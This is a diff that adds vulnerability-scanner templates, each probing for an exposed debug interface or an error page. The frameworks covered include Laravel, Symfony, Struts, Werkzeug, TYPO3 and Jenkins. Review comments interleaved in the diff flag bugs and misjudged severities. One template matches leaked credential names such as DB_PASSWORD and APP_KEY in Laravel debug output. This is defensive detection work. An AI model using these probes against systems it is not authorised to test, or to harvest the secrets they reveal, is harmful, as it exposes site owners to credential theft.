diff --git a/templates/workflows/misconfiguration/laravel-debug-error.yaml b/templates/workflows/misconfiguration/laravel-debug-error.yaml new file mode 100644 index 0000000..9f775ad --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-error.yaml @@ -0,0 +1,26 @@ +id: laravel-debug-error + +info: + name: Larvel Debug Method Enabled + author: dhiyaneshDK + severity: medium + description: Larvel Debug method is enabled. + metadata: + max-request: 1 + tags: debug,laravel,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - Whoops! There was an error + + - type: status + status: + - 500 +# digest: 4b0a00483046022100a27980313b04765c0889cf3781ae98a717537c8bf226181548f1befb4b88bc0b022100b5c1947c8918d39d6a6e27b7917edc78bb098d331d886b26e3ac00da1603a76c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml b/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml new file mode 100644 index 0000000..af8a6bd --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml 
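Review bot: `laravel-debug-error.yaml` misspells Laravel as "Larvel" in both `name` and `description`. More substantively, it only requests `{{BaseURL}}` and expects a `500` containing `Whoops! There was an error`, so it can only detect sites whose front page is already broken; if the aim is to detect debug mode rather than a broken home page, provoke the error the way `laravel-debug-infoleak.yaml` does with a `POST` that yields a `MethodNotAllowedHttpException`.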
@@ -0,0 +1,53 @@ +id: laravel-debug-infoleak + +info: + name: Laravel Debug Info Leak + author: pwnhxl + severity: medium + description: | + This template can be used to detect a Laravel debug information leak by making a POST-based request. + reference: + - https://github.com/dem0ns/improper/blob/master/laravel/5_debug/1.png + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cwe-id: CWE-215 + metadata: + verified: true + max-request: 1 + shodan-query: Laravel-Framework + fofa-query: app="Laravel-Framework" + tags: misconfig,laravel,debug,infoleak + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'vendor/laravel/framework/src/Illuminate/' + - 'MethodNotAllowedHttpException' + condition: and + + - type: word + part: body + words: + - 'DB_PASSWORD' + - 'REDIS_PASSWORD' + - 'MAIL_PASSWORD' + - 'ALIYUN_ACCESSKEYSECRET' + - 'ALIYUN_ACCESSKEYID' + - 'SMS_AUTH_TOKEN' + - 'APP_KEY' + condition: or + + - type: status + status: + - 405 + +# digest: 4a0a00473045022100efe35d703b8ce007284a549152d7642cbaa469dc719432098c9e359f0cdc9e5c02206f93a03a347968aef317624daa120c7827f1bdef918edeb7c5a7d9d50a968827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/php-debugbar-exposure.yaml b/templates/workflows/misconfiguration/php-debugbar-exposure.yaml new file mode 100644 index 0000000..ffb0fd2 --- /dev/null +++ b/templates/workflows/misconfiguration/php-debugbar-exposure.yaml 
@@ -0,0 +1,34 @@ +id: php-debugbar-exposure + +info: + name: Php Debug Bar - Exposure + author: ritikchaddha,pdteam + severity: medium + description: | + The DebugBar integrates easily in any projects and can display profiling data from any part of your application. It comes built-in with data collectors for standard PHP features and popular projects. + reference: + - https://hackerone.com/reports/1883806 + - http://phpdebugbar.com/ + - https://github.com/maximebf/php-debugbar + metadata: + verified: true + max-request: 2 + shodan-query: html:"phpdebugbar" + tags: hackerone,misconfig,php,phpdebug,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/_debugbar/open" + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'contains(body_1, "phpdebugbar") && contains(body, "widget")' + - 'contains_all(body_2, "\"utime\"","\"datetime\"","{\"id") && contains(content_type_2, "application/json")' + condition: or + +# digest: 4a0a00473045022055cb94f2a7454c92dcfed134429b31582f5c4e40bd7915cb109f7e28c7d3c533022100f1b29be9749442a2831ed29e39e61e64b9050dfa755a41ec6bc38abf7abab8d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/php-errors.yaml b/templates/workflows/misconfiguration/php-errors.yaml new file mode 100644 index 0000000..a5e9ee7 --- /dev/null +++ b/templates/workflows/misconfiguration/php-errors.yaml 
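Review bot: the first DSL expression in `php-debugbar-exposure.yaml` mixes an indexed and an unindexed body, `contains(body_1, "phpdebugbar") && contains(body, "widget")`; in a two-request template the bare `body` does not obviously refer to the first response, so if both checks are meant to run against `{{BaseURL}}` write `body_1` in both places, and if the second is meant for `/_debugbar/open` write `body_2`. As it stands the intent cannot be read from the expression.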
@@ -0,0 +1,47 @@ +id: php-errors + +info: + name: PHP errors + author: w4cky_,geeknik,dhiyaneshDK + severity: info + metadata: + max-request: 1 + shodan-query: http.title:"PHP warning" || "Fatal error" + tags: debug,php,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + regex: + - '(?i)Fatal error' + - '(?i)Call to undefined method' + - '(?i)You have an error in your SQL syntax' + - '(?i)MySQL server version for the right syntax to use near' + - '(?i)MySQL cannot create a temporary file' + - '(?i)PHP (Warning|Error)' + - '(?m)^([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$' + - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' + - '(?i)failed to open stream\:' + - '(?i)SAFE MODE Restriction in effect' + - '(?i)Cannot modify header information' + - '(?i)ORA-00921\: unexpected end of SQL command' + - '(?i)ORA-00933\: SQL command not properly ended' + - '(?i)ORA-00936\: missing expression' + - '(?i)ORA-12541\: TNS\:no listener' + - '(?i)uncaught exception' + - '(?i)include_path' + - '(?i)undefined index' + - '(?i)undefined variable\:' + - '(?i)stack trace\:' + - '(?i)expects parameter [0-9]*' + - '(?i)Debug Trace' + - '(?i)<b>Parse error</b>' + - '(?i)syntax error, unexpected' + - '(?i)Allowed Memory Size of \d* Bytes Exhausted' + - '(?i)Maximum execution time of \d* seconds exceeded' + +# digest: 4a0a004730450220253c9cfefeec7f15310fe83d714b5ca6145b0a01cf27947bebe4b9de25acdf4e022100b95ea3ebd9a8458311947ef44210a5752d427f1f37e68bdf5dd996655e909702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/rekognition-image-validation.yaml b/templates/workflows/misconfiguration/rekognition-image-validation.yaml new file mode 100644 index 0000000..05ba29b --- /dev/null +++ b/templates/workflows/misconfiguration/rekognition-image-validation.yaml 
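Review bot: `php-errors.yaml` has extractors but no matchers and no status or content-type gating, so any page whose text merely mentions `stack trace:`, `include_path`, `undefined index` or `uncaught exception` (documentation, blog posts, issue trackers) is reported. Pair the extractors with a matcher on a PHP-specific token (`PHP (Warning|Error)`, `Parse error`, `Fatal error`) or on a 5xx status so the `info` finding means the target itself emitted an error. Also, in `shodan-query: http.title:"PHP warning" || "Fatal error"` the second term is not scoped to a field; it should be `http.title:"Fatal error"` or `http.html:"Fatal error"`.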
@@ -0,0 +1,35 @@ +id: rekognition-image-validation + +info: + name: Rekognition Image Validation Debug UI Panel - Detect + author: tess + severity: info + description: Rekognition Image Validation UI panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: title:"Rekognition Image Validation Debug UI" + tags: misconfig,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Rekognition Image Validation Debug UI' + - 'Optional Parameters' + condition: and + + - type: status + status: + - 200 + +# digest: 490a0046304402202a26973f550c3c1e20225cf9d1b1c1f86fe5893e2a251268dc359d728b940198022046667e4429e033c1cbe1214dfdfe344679e7e519f33734b2181b6921e54f80e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/sitecore-debug-page.yaml b/templates/workflows/misconfiguration/sitecore-debug-page.yaml new file mode 100644 index 0000000..6df095f --- /dev/null +++ b/templates/workflows/misconfiguration/sitecore-debug-page.yaml @@ -0,0 +1,27 @@ +id: sitecore-debug-page + +info: + name: SiteCore Debug Page + author: dhiyaneshDK + severity: low + description: SiteCore debug page is exposed. + metadata: + max-request: 1 + shodan-query: http.title:"Welcome to Sitecore" + tags: debug,sitecore,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/sitecore/'" + + matchers-condition: and + matchers: + - type: word + words: + - 'extranet\Anonymous' + + - type: status + status: + - 404 +# digest: 490a0046304402207e6cbaf4252b5bd45acfd358e91a711f5b4ba6c959fc48ba4bb1e37c3ae1937302207921ca078e2c9c6130e0a08d4cf967e17af3e4df80ac1404e166063d4ce167af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/templates/workflows/misconfiguration/struts-ognl-console.yaml b/templates/workflows/misconfiguration/struts-ognl-console.yaml new file mode 100644 index 0000000..8e5de87 --- /dev/null +++ b/templates/workflows/misconfiguration/struts-ognl-console.yaml @@ -0,0 +1,34 @@ +id: struts-ognl-console + +info: + name: Apache Struts - OGNL Console + author: DhiyaneshDK + severity: unknown + description: | + This development console allows the evaluation of OGNL expressions that could lead to Remote Command Execution + remediation: Restrict access to the struts console on the production server + reference: + - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java + metadata: + verified: true + max-request: 1 + shodan-query: html:"Struts Problem Report" + tags: apache,struts,ognl,panel,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}/struts/webconsole.html?debug=console' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome to the OGNL console!' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100bb73b24e9ca24ea074ca1175b1d76e79d6f59f4c30644f2232dd1c3f7878d0cf0220703e23fa55255a8b6956da4755c05416f7527f199eb6a670a01d3bf9238dfe87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/symfony-debug.yaml b/templates/workflows/misconfiguration/symfony-debug.yaml new file mode 100644 index 0000000..3090850 --- /dev/null +++ b/templates/workflows/misconfiguration/symfony-debug.yaml 
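Review bot: `struts-ognl-console.yaml` sets `severity: unknown` while its own description says the console evaluates OGNL expressions that can lead to remote command execution; give it a real severity (at least `high`) so the workflow's output can be triaged. The `shodan-query: html:"Struts Problem Report"` is the query from `struts-problem-report.yaml` and has nothing to do with the OGNL console page this template matches (`Welcome to the OGNL console!`); replace it or drop it.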
@@ -0,0 +1,41 @@ +id: symfony-debug + +info: + name: Symfony Debug Mode + author: organiccrap,pdteam + severity: high + description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code. + reference: + - https://github.com/synacktiv/eos + metadata: + verified: true + max-request: 4 + shodan-query: http.html:"symfony Profiler" + tags: symfony,debug,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}' + - "{{BaseURL}}/admin_dev.php" + - "{{BaseURL}}/index_dev.php" + - "{{BaseURL}}/app_dev.php" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: header + words: + - 'x-debug-token-link:' + - '/_profiler/' + condition: and + case-insensitive: true + + - type: word + part: body + words: + - 'debug mode is enabled.' + - 'id="sfWebDebugSymfony"' + condition: or +# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/typo3-debug-mode.yaml b/templates/workflows/misconfiguration/typo3-debug-mode.yaml new file mode 100644 index 0000000..7dc0f51 --- /dev/null +++ b/templates/workflows/misconfiguration/typo3-debug-mode.yaml 
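Review bot: the description in `symfony-debug.yaml` reads "A Symfony installations 'debug' interface is enabled"; it should be "A Symfony installation's debug interface is enabled". The header matcher requires both `x-debug-token-link:` and `/_profiler/`, which holds because the token link points into the profiler, but a short comment saying so would save the next reviewer from loosening it to `or`.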
@@ -0,0 +1,31 @@ +id: typo3-debug-mode + +info: + name: TYPO3 Debug Mode Enabled + author: tess + severity: low + description: TYPO3 Debug Mode is enabled. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"TYPO3 Exception" + tags: typo3,debug,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "TYPO3 Exception" + - "Uncaught TYPO3 Exception" + condition: or + + - type: status + status: + - 500 +# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml b/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml new file mode 100644 index 0000000..6879c7b --- /dev/null +++ b/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml @@ -0,0 +1,29 @@ +id: wamp-xdebug-detect + +info: + name: WAMP Xdebug - Detect + author: e_schultze_ + severity: info + description: WAMP Xdebug was detected. + reference: + - https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: debug,config,wamp,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/?phpinfo=-1" + + matchers: + - type: word + words: + - 'xdebug.remote_connect_backOnOn' + part: body + +# digest: 490a0046304402202fd3e9daa0910b6e85ff4e8f4c0390ff720a2b9e76a611ca001a710e847a1ceb022024e41677c8d971632e36456e587d3f7b23bd6cb15938f22be2cec8b9edc150e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
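Review bot: the needle `xdebug.remote_connect_backOnOn` in `wamp-xdebug-detect.yaml` looks like phpinfo text with its table markup stripped (directive name followed by the local and master values run together). phpinfo's HTML output puts the name and each value in separate table cells, so this literal would only match a plain-text rendering; verify it against a real `?phpinfo=-1` response from WAMP and, if the HTML form is what comes back, match on `xdebug.remote_connect_back` alone (the `On` values are not needed to establish that Xdebug is loaded).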
diff --git a/templates/workflows/technologies/werkzeug-debugger-detect.yaml b/templates/workflows/technologies/werkzeug-debugger-detect.yaml new file mode 100644 index 0000000..0a3aefb --- /dev/null +++ b/templates/workflows/technologies/werkzeug-debugger-detect.yaml @@ -0,0 +1,22 @@ +id: werkzeug-debugger-detect + +info: + name: Werkzeug debugger console + author: pdteam + severity: info + metadata: + max-request: 1 + tags: tech,werkzeug + +http: + - method: GET + path: + - "{{BaseURL}}/console" + + matchers: + - type: word + words: + - "

Interactive Console

" + part: body + +# digest: 4a0a00473045022013ddd4960a4aea793abed2a46e4120c2dd2122fd149ec908a73cee9671ad065c022100cf561fa7d30e0f52d52a4b79c30869367c884abf9b90d158eaece619373644f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml new file mode 100644 index 0000000..e1823e4 --- /dev/null +++ b/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -0,0 +1,32 @@ +id: jenkins-stack-trace + +info: + name: Detect Jenkins in Debug Mode with Stack Traces Enabled + author: Dheerajmadhukar + severity: low + description: Module identified that the affected host is running an instance of Jenkins in debug mode, as a result stack traces are enabled. + reference: + - https://hackerone.com/reports/221833 + metadata: + max-request: 1 + tags: jenkins,hackerone + +http: + - method: GET + path: + - "{{BaseURL}}/adjuncts/3a890183/" + + matchers-condition: and + matchers: + - type: word + words: + - "java.lang.StringIndexOutOfBoundsException" + - "String index out of range" + part: body + condition: and + + - type: status + status: + - 500 + +# digest: 4b0a0048304602210090ecedd6e0a611f869394ae2afb7ee2b8fff8fed8cbfff1998250e38da3c79b9022100968c144032a3920ab6ce1e034b707724c5ddc8697cb6c3b1514d1233d75f6022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file
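Review bot: in `werkzeug-debugger-detect.yaml` the only word literal has been broken across lines (`"`, blank line, `Interactive Console`, blank line, `"`) the same way as in `airflow-debug.yaml`; the folded scalar will not equal the original single-line markup, so restore it on one line. The template is also tagged `tech,werkzeug` with `severity: info`, but an exposed `/console` is the Werkzeug interactive debugger, which executes arbitrary Python once its PIN is supplied or disabled; tag it as an exposure and raise the severity, or the workflow will bury it among technology fingerprints. `jenkins-stack-trace.yaml` looks fine: the `and` on the exception class and message plus the `500` status is specific enough.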